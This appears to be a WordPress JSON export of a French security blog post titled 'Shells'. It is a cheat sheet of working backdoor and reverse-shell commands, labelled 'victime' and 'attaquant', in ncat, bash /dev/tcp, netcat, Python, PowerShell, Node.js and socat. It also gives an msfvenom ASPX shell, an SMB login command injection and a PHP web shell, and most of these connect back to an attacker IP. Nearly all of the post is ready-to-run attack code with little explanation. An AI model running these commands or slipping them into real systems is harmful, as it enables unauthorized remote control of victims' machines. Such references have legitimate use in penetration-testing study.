{"id":138,"date":"2021-05-23T15:20:12","date_gmt":"2021-05-23T20:20:12","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=138"},"modified":"2021-07-29T21:00:32","modified_gmt":"2021-07-30T02:00:32","slug":"shells","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/","title":{"rendered":"Shells"},"content":{"rendered":"<p>D\u00e9marrer un backdoor shell sur l&#8217;ordinateur victime<br \/>\n# <code>ncat -l -p 1337 -e &quot;\/bin\/bash -i&quot;<\/code><\/p>\n<p>Connecter sur le backdoor<br \/>\n# <code>ncat 192.168.2.6 1337<\/code><\/p>\n<p>\u00c9couter pour un shell invers\u00e9 (sur l&#8217;ordinateur de l&#8217;attaquant)<br \/>\n# <code>ncat -l -p 23<\/code><\/p>\n<p>D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant. shell invers\u00e9<br \/>\n# <code>ncat -e &quot;\/bin\/bash -i&quot; 192.168.2.7 23<\/code><\/p>\n<p>D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant, Bash uniquement. shell invers\u00e9<br \/>\n# <pre><code>bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1\nbash -c &quot;bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1&quot;\nrm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.9.0.15 5555 &gt;\/tmp\/f #alternative\n<\/code><\/pre><\/p>\n<p>Cr\u00e9er un shell invers\u00e9 en python<br \/>\n<code>python -c &#039;import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.2.223&quot;,2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/p>\n<p>WebShell Windows<br \/>\n<pre><code>powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27&lt;IP&gt;%27%2C&lt;PORT&gt;%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22\npowershell.exe -c &quot;$client = New-Object System.Net.Sockets.TCPClient(&#039;IP&#039;,PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + &#039;PS &#039; + (pwd).Path + &#039;&gt; &#039;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()&quot;<\/code><\/pre><\/p>\n<p>Avoir un meilleur shell (shell interactive o\u00f9 il y a de l&#8217;\u00e9cho)<br \/>\n# <pre><code>python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nCtl+Z\nstty raw -echo\nfg\nreset\nxterm-256color\nexport $TERM=xterm\nexport $SHELL=bash\n<\/code><\/pre><\/p>\n<p>Cr\u00e9er un shell aspx pour Windows IIS<br \/>\n<pre><code>\nmsfvenom -p windows\/x64\/shell_reverse_tcp LHOST=10.9.0.15 LPORT=4444 \u2014 platform windows -a x64 -f aspx -o shell.aspx\n<\/code><\/pre><\/p>\n<p>Transformation d&#8217;un Shell SMB en Shell invers\u00e9.<br \/>\n<pre><code># smbclient -U &quot;username%password&quot; \/\/192.168.0.6\/mo_partage\n# smb&gt; login &quot;\/=nc &#039;192.168.0.222&#039; 4444 -e \/bin\/bash&quot;<\/code><\/pre><\/p>\n<p>Shell en php<br \/>\n<pre><code>\nnc -nlvp 1234 #sur l&#039;attaquant\n&lt;?php system($_GET[&#039;cmd&#039;]); ?&gt; \/\/ shell.php\nhttp:\/\/192.168.2.22\/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.2.64%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22\/bin\/bash%22,%22-i%22]);%27&nbsp;&nbsp;\n<\/code><\/pre><\/p>\n<p>Shell en node.js<br \/>\n<pre><code>\n(function(){\n&nbsp;&nbsp;&nbsp;&nbsp;var net = require(&quot;net&quot;),\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cp = require(&quot;child_process&quot;),\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sh = cp.spawn(&quot;\/bin\/sh&quot;, []);\n&nbsp;&nbsp;&nbsp;&nbsp;var client = new net.Socket();\n&nbsp;&nbsp;&nbsp;&nbsp;client.connect(4242, &quot;10.0.0.1&quot;, function(){\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;client.pipe(sh.stdin);\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sh.stdout.pipe(client);\n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sh.stderr.pipe(client);\n&nbsp;&nbsp;&nbsp;&nbsp;});\n&nbsp;&nbsp;&nbsp;&nbsp;return \/a\/; \/\/ Prevents the Node.js application form crashing\n})();\n<\/code><\/pre><\/p>\n<p>Obtenir un meilleur shell (shell interactif)<br \/>\n<pre><code>\npython -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\n<\/code><\/pre><br \/>\n<pre><code>\nsocat file:`tty`,raw,echo=0 tcp-listen:4444 #attaquant\nsocat exec:&#039;bash -li&#039;,pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444&nbsp;&nbsp;#victime\n<\/code><\/pre><br \/>\n<pre><code>\n# In reverse shell\n$ python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nCtrl-Z\n\n# In Kali\n$ stty raw -echo\n$ fg\n\n# In reverse shell\n$ reset\n$ export SHELL=bash\n$ export TERM=xterm-256color\n$ stty rows &lt;num&gt; columns &lt;cols&gt;\n<\/code><\/pre><\/p>\n<p><a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Methodology%20and%20Resources\/Reverse%20Shell%20Cheatsheet.md\">Autres id\u00e9es pour des reverse shells<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>D\u00e9marrer un backdoor shell sur l&#8217;ordinateur victime # ncat -l -p 1337 -e &quot;\/bin\/bash -i&quot; Connecter sur le backdoor # ncat 192.168.2.6 1337 \u00c9couter pour un shell invers\u00e9 (sur l&#8217;ordinateur de l&#8217;attaquant) # ncat -l -p 23 D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant. shell invers\u00e9 # ncat -e &quot;\/bin\/bash -i&quot; 192.168.2.7 23 D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant, Bash uniquement. shell invers\u00e9 # bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1 bash -c &quot;bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1&quot; rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.9.0.15 5555 &gt;\/tmp\/f #alternative Cr\u00e9er un shell invers\u00e9 en <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Shells - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Shells - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"D\u00e9marrer un backdoor shell sur l&#8217;ordinateur victime # ncat -l -p 1337 -e &quot;\/bin\/bash -i&quot; Connecter sur le backdoor # ncat 192.168.2.6 1337 \u00c9couter pour un shell invers\u00e9 (sur l&#8217;ordinateur de l&#8217;attaquant) # ncat -l -p 23 D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant. shell invers\u00e9 # ncat -e &quot;\/bin\/bash -i&quot; 192.168.2.7 23 D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant, Bash uniquement. shell invers\u00e9 # bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1 bash -c &quot;bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1&quot; rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.9.0.15 5555 &gt;\/tmp\/f #alternative Cr\u00e9er un shell invers\u00e9 en\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-05-23T20:20:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-30T02:00:32+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/\",\"name\":\"Shells - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-05-23T20:20:12+00:00\",\"dateModified\":\"2021-07-30T02:00:32+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shells\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Shells - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/","og_locale":"fr_CA","og_type":"article","og_title":"Shells - S\u00e9curiser votre site","og_description":"D\u00e9marrer un backdoor shell sur l&#8217;ordinateur victime # ncat -l -p 1337 -e &quot;\/bin\/bash -i&quot; Connecter sur le backdoor # ncat 192.168.2.6 1337 \u00c9couter pour un shell invers\u00e9 (sur l&#8217;ordinateur de l&#8217;attaquant) # ncat -l -p 23 D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant. shell invers\u00e9 # ncat -e &quot;\/bin\/bash -i&quot; 192.168.2.7 23 D\u00e9marrer le shell sur la victime et permettre le contr\u00f4le sur l&#8217;attaquant, Bash uniquement. shell invers\u00e9 # bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1 bash -c &quot;bash -i &amp;&gt;\/dev\/tcp\/192.168.2.7\/23 0&gt;&amp;1&quot; rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.9.0.15 5555 &gt;\/tmp\/f #alternative Cr\u00e9er un shell invers\u00e9 en","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-05-23T20:20:12+00:00","article_modified_time":"2021-07-30T02:00:32+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/","name":"Shells - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-05-23T20:20:12+00:00","dateModified":"2021-07-30T02:00:32+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/05\/23\/shells\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Shells"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/138"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=138"}],"version-history":[{"count":19,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/138\/revisions"}],"predecessor-version":[{"id":706,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/138\/revisions\/706"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=138"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=138"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=138"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}